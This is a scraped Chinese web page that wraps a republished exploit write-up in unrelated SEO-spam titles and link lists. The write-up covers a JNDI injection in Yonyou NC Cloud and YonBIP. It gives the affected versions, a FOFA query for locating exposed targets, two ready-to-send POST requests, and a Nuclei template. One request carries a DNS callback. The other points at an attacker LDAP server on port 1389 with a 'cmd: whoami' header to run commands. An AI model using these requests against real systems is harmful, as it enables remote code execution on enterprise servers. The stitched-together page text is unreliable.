当前位置: 首页 > news >正文

网站建设 中企动力西安陕西 网站建设

网站建设 中企动力西安,陕西 网站建设,wordpress ajax登录插件,seo快速软件免责声明#xff1a;文章来源互联网收集整理#xff0c;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该…免责声明文章来源互联网收集整理请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 Ⅰ、漏洞描述 用友NC是“企业资源规划Enterprise Resource Planning”的缩写是指用友软件股份有限公司开发的一套企业管理软。用友NC系统是一种集成管理企业各项业务流程的信息化解决方案。该系统涵盖了财务、人力资源、供应链管理等多个方面旨在帮助企业提高运营效率、优化资源利用、提升管理水平。 用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet 接口处存在JNDI注入漏洞恶意攻击者可利用该漏洞在服务器上执行任意命令尽可能会导致服务器失陷。 影响范围 NCC2105、NCC2111、YonBIP高级版2207、YonBIP高级版2305 Ⅱ、fofa语句 app用友-NC-Cloud Ⅲ、漏洞复现 POC-1 POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/json Connection: close{ data_source:ldap://your-dns, user: } 1、构建poc 2、DNS记录 3、利用此漏洞执行命令 POC-2 POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1 Host: 127.0.0.1 cmd: whoami Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/json Connection: close{ data_source:ldap://IP:1389/TomcatBypass/SpringEcho, user: } 4、构建POC Ⅳ、Nuclei-POC id: yonyou-NC-Cloud-JNDIinfo:name: 用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞author: WLFseverity: highmetadata: fofa-query: app用友-NC-Cloud variables:filename: {{to_lower(rand_base(10))}}boundary: {{to_lower(rand_base(20))}} http:- raw:- |POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/jsonConnection: close{data_source:ldap://{{interactsh-url}},user:}matchers:- type: dsldsl:- contains(interactsh_protocol, dns)condition: and Ⅴ、修复建议 升级至安全版本
http://www.zqtcl.cn/news/793181/

相关文章:

  • 西安市城乡建设管理局网站6一级域名生成二级域名
  • 网站建设沙漠风服装公司网站源码
  • 体检营销型网站php网站建设培训班
  • 做洁具最好的网站数据分析
  • 郑州网站建设丶汉狮网络网站建设中图片是什么意思
  • 深圳网站建设公司设计公司做影视网站用主机还是用服务器
  • 网站建设价格如何做问卷调查网站
  • 网络营销推广合同天津网站seo策划
  • 明年做那个网站致富wordpress loper
  • 网站开发原理柳州网站推广
  • 杭州高端网站开发重庆网站建设去迅法网
  • 营销型网站建设调查表用flash做游戏下载网站
  • 企业网站申请流程北京网站建设北京
  • 响应式网站导航栏模板python开发wordpress
  • 大学生创新创业大赛一个网站做两个优化可以做吗
  • 网站设计建设铁总建设函网站
  • 做期货都看哪个网站什么是网络营销的综合工具
  • 专做袜子的网站北京学设计去哪个网站好
  • 一搜网站制作网站支付怎么做
  • 广州 科技网站建设公司国外酷炫flash网站
  • 焦作网站建设焦作wordpress怎么进行301 htaccess
  • 那个网站能找到人做品牌文化的网站
  • 家里做网站买什么服务器好网站建设报价单 文库
  • 网站百度建设银行广西分行招聘网站
  • 打开网站显示404北京公司请做网站工资
  • 网站开发验收流程图app开发制作的图片
  • 网站流量的作用app定制开发和模板开发的区别
  • 如何做分公司网站网站建设与设计开题报告
  • 易语言怎么做网站网络推广客户渠道
  • 唐山哪里有做网站的网站服务器在